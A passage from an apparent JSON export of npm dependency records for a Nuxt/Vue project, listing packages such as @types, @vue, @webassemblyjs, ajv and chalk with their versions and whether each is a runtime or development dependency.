"direct":false,"kind":"runtime","optional":false},{"id":13870349520,"package_name":"@types","ecosystem":"npm","requirements":"json-schema@7.0.12","direct":false,"kind":"runtime","optional":false},{"id":13870349521,"package_name":"@types","ecosystem":"npm","requirements":"json5@0.0.29","direct":false,"kind":"development","optional":false},{"id":13870349522,"package_name":"@types","ecosystem":"npm","requirements":"jsonfile@6.1.1","direct":false,"kind":"development","optional":false},{"id":13870349523,"package_name":"@types","ecosystem":"npm","requirements":"lodash-es@4.17.9","direct":false,"kind":"development","optional":false},{"id":13870349524,"package_name":"@types","ecosystem":"npm","requirements":"lodash@4.14.196","direct":false,"kind":"development","optional":false},{"id":13870349525,"package_name":"@types","ecosystem":"npm","requirements":"mdast@3.0.12","direct":false,"kind":"development","optional":false},{"id":13870349526,"package_name":"@types","ecosystem":"npm","requirements":"ms@0.7.31","direct":false,"kind":"development","optional":false},{"id":13870349527,"package_name":"@types","ecosystem":"npm","requirements":"node-sass@4.11.3","direct":false,"kind":"development","optional":false},{"id":13870349528,"package_name":"@types","ecosystem":"npm","requirements":"node@18.17.18","direct":false,"kind":"runtime","optional":false},{"id":13870349529,"package_name":"@types","ecosystem":"npm","requirements":"normalize-package-data@2.4.1","direct":false,"kind":"development","optional":false},{"id":13870349530,"package_name":"@types","ecosystem":"npm","requirements":"parse-json@4.0.0","direct":false,"kind":"runtime","optional":false},{"id":13870349531,"package_name":"@types","ecosystem":"npm","requirements":"parse5@6.0.3","direct":false,"kind":"development","optional":false},{"id":13870349532,"package_name":"@types","ecosystem":"npm","requirements":"pify@5.0.1","direct":false,"kind":"development","optional":false},{"id":13870349533,"package_name":"@types","ecosystem":"npm","requirements":"pug@2.0.6","direct":false,"kind":"development","optional":false},{"id":13870349534,"package_name":"@types","ecosystem":"npm","requirements":"resolve@1.20.2","direct":false,"kind":"runtime","optional":false},{"id":13870349535,"package_name":"@types","ecosystem":"npm","requirements":"sass-loader@8.0.5","direct":false,"kind":"development","optional":false},{"id":13870349536,"package_name":"@types","ecosystem":"npm","requirements":"semver@7.5.2","direct":false,"kind":"development","optional":false},{"id":13870349537,"package_name":"@types","ecosystem":"npm","requirements":"source-list-map@0.1.2","direct":false,"kind":"development","optional":false},{"id":13870349538,"package_name":"@types","ecosystem":"npm","requirements":"stack-utils@2.0.1","direct":false,"kind":"development","optional":false},{"id":13870349539,"package_name":"@types","ecosystem":"npm","requirements":"tapable@1.0.8","direct":false,"kind":"development","optional":false},{"id":13870349540,"package_name":"@types","ecosystem":"npm","requirements":"uglify-js@3.17.1","direct":false,"kind":"development","optional":false},{"id":13870349541,"package_name":"@types","ecosystem":"npm","requirements":"unist@2.0.7","direct":false,"kind":"development","optional":false},{"id":13870349542,"package_name":"@types","ecosystem":"npm","requirements":"unist@3.0.0","direct":false,"kind":"development","optional":false},{"id":13870349543,"package_name":"@types","ecosystem":"npm","requirements":"web-bluetooth@0.0.16","direct":false,"kind":"development","optional":false},{"id":13870349544,"package_name":"@types","ecosystem":"npm","requirements":"web-bluetooth@0.0.17","direct":false,"kind":"development","optional":false},{"id":13870349545,"package_name":"@types","ecosystem":"npm","requirements":"webpack-bundle-analyzer@4.6.0","direct":false,"kind":"development","optional":false},{"id":13870349546,"package_name":"@types","ecosystem":"npm","requirements":"webpack-hot-middleware@2.25.6","direct":false,"kind":"development","optional":false},{"id":13870349547,"package_name":"@types","ecosystem":"npm","requirements":"webpack-sources@3.2.0","direct":false,"kind":"development","optional":false},{"id":13870349548,"package_name":"@types","ecosystem":"npm","requirements":"webpack-virtual-modules@0.1.1","direct":false,"kind":"development","optional":false},{"id":13870349549,"package_name":"@types","ecosystem":"npm","requirements":"webpack@4.41.33","direct":false,"kind":"development","optional":false},{"id":13870349550,"package_name":"@types","ecosystem":"npm","requirements":"yargs-parser@21.0.0","direct":false,"kind":"runtime","optional":false},{"id":13870349551,"package_name":"@types","ecosystem":"npm","requirements":"yargs@17.0.24","direct":false,"kind":"runtime","optional":false},{"id":13870349552,"package_name":"@typescript-eslint","ecosystem":"npm","requirements":"eslint-plugin@6.6.0(@typescript-eslint","direct":false,"kind":"development","optional":false},{"id":13870349553,"package_name":"@typescript-eslint","ecosystem":"npm","requirements":"parser@6.6.0(eslint@8.49.0)(typescript@5.2.2)","direct":false,"kind":"development","optional":false},{"id":13870349554,"package_name":"@typescript-eslint","ecosystem":"npm","requirements":"scope-manager@6.6.0","direct":false,"kind":"development","optional":false},{"id":13870349555,"package_name":"@typescript-eslint","ecosystem":"npm","requirements":"type-utils@6.6.0(eslint@8.49.0)(typescript@5.2.2)","direct":false,"kind":"development","optional":false},{"id":13870349556,"package_name":"@typescript-eslint","ecosystem":"npm","requirements":"types@6.6.0","direct":false,"kind":"development","optional":false},{"id":13870349557,"package_name":"@typescript-eslint","ecosystem":"npm","requirements":"typescript-estree@6.6.0(typescript@5.2.2)","direct":false,"kind":"development","optional":false},{"id":13870349558,"package_name":"@typescript-eslint","ecosystem":"npm","requirements":"utils@6.6.0(eslint@8.49.0)(typescript@5.2.2)","direct":false,"kind":"development","optional":false},{"id":13870349559,"package_name":"@typescript-eslint","ecosystem":"npm","requirements":"visitor-keys@6.6.0","direct":false,"kind":"development","optional":false},{"id":13870349560,"package_name":"@unhead","ecosystem":"npm","requirements":"dom@1.7.4","direct":false,"kind":"runtime","optional":false},{"id":13870349561,"package_name":"@unhead","ecosystem":"npm","requirements":"schema@1.7.4","direct":false,"kind":"runtime","optional":false},{"id":13870349562,"package_name":"@unhead","ecosystem":"npm","requirements":"shared@1.7.4","direct":false,"kind":"runtime","optional":false},{"id":13870349563,"package_name":"@unhead","ecosystem":"npm","requirements":"ssr@1.7.4","direct":false,"kind":"runtime","optional":false},{"id":13870349564,"package_name":"@unhead","ecosystem":"npm","requirements":"vue@1.7.4(vue@3.3.4)","direct":false,"kind":"runtime","optional":false},{"id":13870349565,"package_name":"@unocss","ecosystem":"npm","requirements":"reset@0.50.8","direct":false,"kind":"development","optional":false},{"id":13870349566,"package_name":"@vercel","ecosystem":"npm","requirements":"nft@0.23.1","direct":false,"kind":"runtime","optional":false},{"id":13870349567,"package_name":"@vitejs","ecosystem":"npm","requirements":"plugin-vue-jsx@3.0.2(vite@4.4.9)(vue@3.3.4)","direct":false,"kind":"runtime","optional":false},{"id":13870349568,"package_name":"@vitejs","ecosystem":"npm","requirements":"plugin-vue@4.3.4(vite@4.4.9)(vue@3.3.4)","direct":false,"kind":"runtime","optional":false},{"id":13870349569,"package_name":"@vitest","ecosystem":"npm","requirements":"expect@0.33.0","direct":false,"kind":"development","optional":false},{"id":13870349570,"package_name":"@vitest","ecosystem":"npm","requirements":"runner@0.33.0","direct":false,"kind":"development","optional":false},{"id":13870349571,"package_name":"@vitest","ecosystem":"npm","requirements":"snapshot@0.33.0","direct":false,"kind":"development","optional":false},{"id":13870349572,"package_name":"@vitest","ecosystem":"npm","requirements":"spy@0.33.0","direct":false,"kind":"development","optional":false},{"id":13870349573,"package_name":"@vitest","ecosystem":"npm","requirements":"ui@0.33.0(vitest@0.33.0)","direct":false,"kind":"development","optional":false},{"id":13870349574,"package_name":"@vitest","ecosystem":"npm","requirements":"utils@0.33.0","direct":false,"kind":"development","optional":false},{"id":13870349575,"package_name":"@volar","ecosystem":"npm","requirements":"language-core@1.10.0","direct":false,"kind":"runtime","optional":false},{"id":13870349576,"package_name":"@volar","ecosystem":"npm","requirements":"language-core@1.4.1","direct":false,"kind":"development","optional":false},{"id":13870349577,"package_name":"@volar","ecosystem":"npm","requirements":"source-map@1.10.0","direct":false,"kind":"runtime","optional":false},{"id":13870349578,"package_name":"@volar","ecosystem":"npm","requirements":"source-map@1.4.1","direct":false,"kind":"development","optional":false},{"id":13870349579,"package_name":"@volar","ecosystem":"npm","requirements":"typescript@1.10.0","direct":false,"kind":"runtime","optional":false},{"id":13870349580,"package_name":"@volar","ecosystem":"npm","requirements":"vue-language-core@1.6.5","direct":false,"kind":"development","optional":false},{"id":13870349581,"package_name":"@vue-macros","ecosystem":"npm","requirements":"common@1.6.2(rollup@3.29.1)(vue@3.3.4)","direct":false,"kind":"runtime","optional":false},{"id":13870349582,"package_name":"@vue","ecosystem":"npm","requirements":"babel-helper-vue-transform-on@1.1.5","direct":false,"kind":"runtime","optional":false},{"id":13870349737,"package_name":"color-name@1.1.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349583,"package_name":"@vue","ecosystem":"npm","requirements":"babel-plugin-jsx@1.1.5(@babel","direct":false,"kind":"runtime","optional":false},{"id":13870349584,"package_name":"@vue","ecosystem":"npm","requirements":"compiler-core@3.3.4","direct":false,"kind":"runtime","optional":false},{"id":13870349585,"package_name":"@vue","ecosystem":"npm","requirements":"compiler-dom@3.3.4","direct":false,"kind":"runtime","optional":false},{"id":13870349586,"package_name":"@vue","ecosystem":"npm","requirements":"compiler-sfc@3.3.4","direct":false,"kind":"runtime","optional":false},{"id":13870349587,"package_name":"@vue","ecosystem":"npm","requirements":"compiler-ssr@3.3.4","direct":false,"kind":"runtime","optional":false},{"id":13870349588,"package_name":"@vue","ecosystem":"npm","requirements":"devtools-api@6.5.0","direct":false,"kind":"runtime","optional":false},{"id":13870349589,"package_name":"@vue","ecosystem":"npm","requirements":"language-core@1.8.13(typescript@5.2.2)","direct":false,"kind":"runtime","optional":false},{"id":13870349590,"package_name":"@vue","ecosystem":"npm","requirements":"language-core@1.8.8(typescript@5.2.2)","direct":false,"kind":"development","optional":false},{"id":13870349591,"package_name":"@vue","ecosystem":"npm","requirements":"reactivity-transform@3.3.4","direct":false,"kind":"runtime","optional":false},{"id":13870349592,"package_name":"@vue","ecosystem":"npm","requirements":"reactivity@3.3.4","direct":false,"kind":"runtime","optional":false},{"id":13870349593,"package_name":"@vue","ecosystem":"npm","requirements":"runtime-core@3.3.4","direct":false,"kind":"runtime","optional":false},{"id":13870349594,"package_name":"@vue","ecosystem":"npm","requirements":"runtime-dom@3.3.4","direct":false,"kind":"runtime","optional":false},{"id":13870349595,"package_name":"@vue","ecosystem":"npm","requirements":"server-renderer@3.3.4(vue@3.3.4)","direct":false,"kind":"runtime","optional":false},{"id":13870349596,"package_name":"@vue","ecosystem":"npm","requirements":"shared@3.3.4","direct":false,"kind":"runtime","optional":false},{"id":13870349597,"package_name":"@vue","ecosystem":"npm","requirements":"test-utils@2.4.1(vue@3.3.4)","direct":false,"kind":"development","optional":false},{"id":13870349598,"package_name":"@vue","ecosystem":"npm","requirements":"typescript@1.8.13(typescript@5.2.2)","direct":false,"kind":"runtime","optional":false},{"id":13870349599,"package_name":"@vueuse","ecosystem":"npm","requirements":"core@10.3.0(vue@3.3.4)","direct":false,"kind":"development","optional":false},{"id":13870349600,"package_name":"@vueuse","ecosystem":"npm","requirements":"core@9.13.0(vue@3.3.4)","direct":false,"kind":"development","optional":false},{"id":13870349601,"package_name":"@vueuse","ecosystem":"npm","requirements":"integrations@10.3.0(focus-trap@7.5.2)(fuse.js@6.6.2)(vue@3.3.4)","direct":false,"kind":"development","optional":false},{"id":13870349602,"package_name":"@vueuse","ecosystem":"npm","requirements":"metadata@10.3.0","direct":false,"kind":"development","optional":false},{"id":13870349603,"package_name":"@vueuse","ecosystem":"npm","requirements":"metadata@9.13.0","direct":false,"kind":"development","optional":false},{"id":13870349604,"package_name":"@vueuse","ecosystem":"npm","requirements":"nuxt@10.3.0(nuxt@packages+nuxt)(vue@3.3.4)","direct":false,"kind":"development","optional":false},{"id":13870349605,"package_name":"@vueuse","ecosystem":"npm","requirements":"shared@10.3.0(vue@3.3.4)","direct":false,"kind":"development","optional":false},{"id":13870349606,"package_name":"@vueuse","ecosystem":"npm","requirements":"shared@9.13.0(vue@3.3.4)","direct":false,"kind":"development","optional":false},{"id":13870349607,"package_name":"@webassemblyjs","ecosystem":"npm","requirements":"ast@1.11.6","direct":false,"kind":"runtime","optional":false},{"id":13870349608,"package_name":"@webassemblyjs","ecosystem":"npm","requirements":"floating-point-hex-parser@1.11.6","direct":false,"kind":"runtime","optional":false},{"id":13870349609,"package_name":"@webassemblyjs","ecosystem":"npm","requirements":"helper-api-error@1.11.6","direct":false,"kind":"runtime","optional":false},{"id":13870349610,"package_name":"@webassemblyjs","ecosystem":"npm","requirements":"helper-buffer@1.11.6","direct":false,"kind":"runtime","optional":false},{"id":13870349611,"package_name":"@webassemblyjs","ecosystem":"npm","requirements":"helper-numbers@1.11.6","direct":false,"kind":"runtime","optional":false},{"id":13870349612,"package_name":"@webassemblyjs","ecosystem":"npm","requirements":"helper-wasm-bytecode@1.11.6","direct":false,"kind":"runtime","optional":false},{"id":13870349613,"package_name":"@webassemblyjs","ecosystem":"npm","requirements":"helper-wasm-section@1.11.6","direct":false,"kind":"runtime","optional":false},{"id":13870349614,"package_name":"@webassemblyjs","ecosystem":"npm","requirements":"ieee754@1.11.6","direct":false,"kind":"runtime","optional":false},{"id":13870349615,"package_name":"@webassemblyjs","ecosystem":"npm","requirements":"leb128@1.11.6","direct":false,"kind":"runtime","optional":false},{"id":13870349616,"package_name":"@webassemblyjs","ecosystem":"npm","requirements":"utf8@1.11.6","direct":false,"kind":"runtime","optional":false},{"id":13870349617,"package_name":"@webassemblyjs","ecosystem":"npm","requirements":"wasm-edit@1.11.6","direct":false,"kind":"runtime","optional":false},{"id":13870349618,"package_name":"@webassemblyjs","ecosystem":"npm","requirements":"wasm-gen@1.11.6","direct":false,"kind":"runtime","optional":false},{"id":13870349619,"package_name":"@webassemblyjs","ecosystem":"npm","requirements":"wasm-opt@1.11.6","direct":false,"kind":"runtime","optional":false},{"id":13870349620,"package_name":"@webassemblyjs","ecosystem":"npm","requirements":"wasm-parser@1.11.6","direct":false,"kind":"runtime","optional":false},{"id":13870349621,"package_name":"@webassemblyjs","ecosystem":"npm","requirements":"wast-printer@1.11.6","direct":false,"kind":"runtime","optional":false},{"id":13870349622,"package_name":"@xtuc","ecosystem":"npm","requirements":"ieee754@1.2.0","direct":false,"kind":"runtime","optional":false},{"id":13870349623,"package_name":"@xtuc","ecosystem":"npm","requirements":"long@4.2.2","direct":false,"kind":"runtime","optional":false},{"id":13870349624,"package_name":"abbrev@1.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349625,"package_name":"acorn-import-assertions@1.9.0(acorn@8.10.0)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349626,"package_name":"acorn-jsx@5.3.2(acorn@8.10.0)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349627,"package_name":"acorn-walk@8.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349628,"package_name":"acorn@7.4.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349629,"package_name":"acorn@8.10.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349630,"package_name":"agent-base@6.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349631,"package_name":"ajv-formats@2.1.1(ajv@8.12.0)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349632,"package_name":"ajv-keywords@3.5.2(ajv@6.12.6)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349633,"package_name":"ajv-keywords@5.1.0(ajv@8.12.0)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349634,"package_name":"ajv@6.12.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349635,"package_name":"ajv@8.12.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349636,"package_name":"ansi-colors@4.1.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349637,"package_name":"ansi-escapes@4.3.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349638,"package_name":"ansi-html-community@0.0.8","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349639,"package_name":"ansi-regex@5.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349640,"package_name":"ansi-regex@6.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349641,"package_name":"ansi-styles@3.2.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349642,"package_name":"ansi-styles@4.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349643,"package_name":"ansi-styles@5.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349644,"package_name":"ansi-styles@6.2.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349645,"package_name":"anymatch@3.1.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349646,"package_name":"aproba@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349647,"package_name":"arch@2.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349648,"package_name":"archiver-utils@4.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349649,"package_name":"archiver@6.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349650,"package_name":"are-docs-informative@0.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349651,"package_name":"are-we-there-yet@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349652,"package_name":"arg@5.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349653,"package_name":"argparse@1.0.10","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349654,"package_name":"argparse@2.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349655,"package_name":"array-buffer-byte-length@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349656,"package_name":"array-includes@3.1.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349657,"package_name":"array-union@2.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349658,"package_name":"array.prototype.findlastindex@1.2.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349659,"package_name":"array.prototype.flat@1.3.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349660,"package_name":"array.prototype.flatmap@1.3.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349661,"package_name":"arraybuffer.prototype.slice@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349662,"package_name":"asap@2.0.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349663,"package_name":"assert-never@1.2.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349664,"package_name":"assert@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349665,"package_name":"assertion-error@1.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349666,"package_name":"ast-kit@0.9.4(rollup@3.29.1)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349667,"package_name":"ast-types@0.15.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349668,"package_name":"ast-walker-scope@0.4.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349669,"package_name":"async-sema@3.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349670,"package_name":"async@3.2.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349671,"package_name":"autoprefixer@10.4.16(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349672,"package_name":"available-typed-arrays@1.0.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349673,"package_name":"b4a@1.6.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349674,"package_name":"babel-plugin-istanbul@6.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349675,"package_name":"babel-preset-current-node-syntax@1.0.1(@babel","ecosystem":"npm","requirements":"core@7.22.10)","direct":false,"kind":"development","optional":false},{"id":13870349676,"package_name":"babel-walk@3.0.0-canary-5","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349677,"package_name":"bail@2.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349678,"package_name":"balanced-match@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349679,"package_name":"big-integer@1.6.51","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349680,"package_name":"big.js@5.2.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349681,"package_name":"binary-extensions@2.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349682,"package_name":"bindings@1.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349683,"package_name":"boolbase@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349684,"package_name":"bplist-parser@0.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349685,"package_name":"brace-expansion@1.1.11","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349686,"package_name":"brace-expansion@2.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349687,"package_name":"braces@3.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349688,"package_name":"browserslist@4.21.10","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349689,"package_name":"bser@2.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349690,"package_name":"buffer-crc32@0.2.13","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349691,"package_name":"buffer-from@1.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349692,"package_name":"builtin-modules@3.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349693,"package_name":"builtins@5.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349694,"package_name":"bundle-name@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349695,"package_name":"busboy@1.6.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349696,"package_name":"c12@1.4.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349697,"package_name":"cac@6.7.14","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349698,"package_name":"call-bind@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349699,"package_name":"callsites@3.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349700,"package_name":"camel-case@4.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349701,"package_name":"camelcase@5.3.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349702,"package_name":"camelcase@6.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349703,"package_name":"caniuse-api@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349704,"package_name":"caniuse-lite@1.0.30001538","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349705,"package_name":"capital-case@1.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349706,"package_name":"case-police@0.6.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349707,"package_name":"ccount@2.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349708,"package_name":"chai@4.3.7","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349709,"package_name":"chalk@2.4.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349710,"package_name":"chalk@4.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349711,"package_name":"chalk@5.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349712,"package_name":"change-case@4.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349713,"package_name":"changelogen@0.5.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349717,"package_name":"character-entities-html4@2.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349718,"package_name":"character-entities-legacy@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349719,"package_name":"character-entities@2.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349720,"package_name":"character-parser@2.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349721,"package_name":"character-reference-invalid@2.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349722,"package_name":"check-error@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349723,"package_name":"chokidar@3.5.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349724,"package_name":"chownr@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349725,"package_name":"chroma-js@2.4.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349726,"package_name":"chrome-trace-event@1.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349727,"package_name":"ci-info@3.8.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349728,"package_name":"citty@0.1.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349729,"package_name":"clean-regexp@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349730,"package_name":"clear@0.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349731,"package_name":"clipboardy@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349732,"package_name":"cliui@8.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349733,"package_name":"cluster-key-slot@1.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349734,"package_name":"color-convert@1.9.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349735,"package_name":"color-convert@2.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349736,"package_name":"color-name@1.1.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349738,"package_name":"color-support@1.1.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349739,"package_name":"colord@2.9.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349740,"package_name":"colorette@2.0.20","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349741,"package_name":"comma-separated-tokens@2.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349742,"package_name":"commander@10.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349743,"package_name":"commander@2.20.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349744,"package_name":"commander@7.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349745,"package_name":"commander@8.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349746,"package_name":"commander@9.4.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349747,"package_name":"comment-parser@1.3.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349748,"package_name":"commondir@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349749,"package_name":"compress-commons@5.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349750,"package_name":"concat-map@0.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349751,"package_name":"config-chain@1.1.13","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349752,"package_name":"consola@2.15.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349753,"package_name":"consola@3.2.3","ecosystem":"npm","requirements":null,"di